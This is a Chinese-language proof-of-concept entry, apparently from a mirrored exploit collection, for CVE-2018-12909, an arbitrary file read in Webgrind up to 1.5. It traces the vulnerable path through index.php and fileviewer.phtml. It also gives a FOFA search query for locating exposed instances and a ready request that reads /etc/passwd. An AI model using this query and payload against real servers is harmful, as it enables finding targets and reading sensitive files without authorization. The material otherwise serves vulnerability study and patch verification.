admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Webgrind fileviewer.phtml 任意文件读取漏洞 CVE-2018-12909.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

39 lines
903 B
Markdown
Raw Blame History

# Webgrind fileviewer.phtml 任意文件读取漏洞 CVE-2018-12909
## 漏洞描述
Webgrind是一套PHP执行时间分析工具。其中Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可以通过漏洞读取服务器敏感文件
## 漏洞影响
```
Webgrind <= 1.5
```
## FOFA
```
app="Webgrind"
```
## 漏洞复现
主页面
![image-20220829102424295](./images/202208291024336.png)
方法调用在 index.php 中
![image-20220829102436964](./images/202208291024049.png)
当参数为 fileviewer 时,将参数传递包含在文件 templates/fileviewer.phtml 中
![image-20220829102450812](./images/202208291024892.png)
参数 file 传入 `fileviewer.phtml` 通过函数 `highlight_file` 显示在页面中, 验证POC
```
/index.php?op=fileviewer&file=/etc/passwd
```
![image-20220829102503956](./images/202208291025034.png)
Reference in New Issue View Git Blame Copy Permalink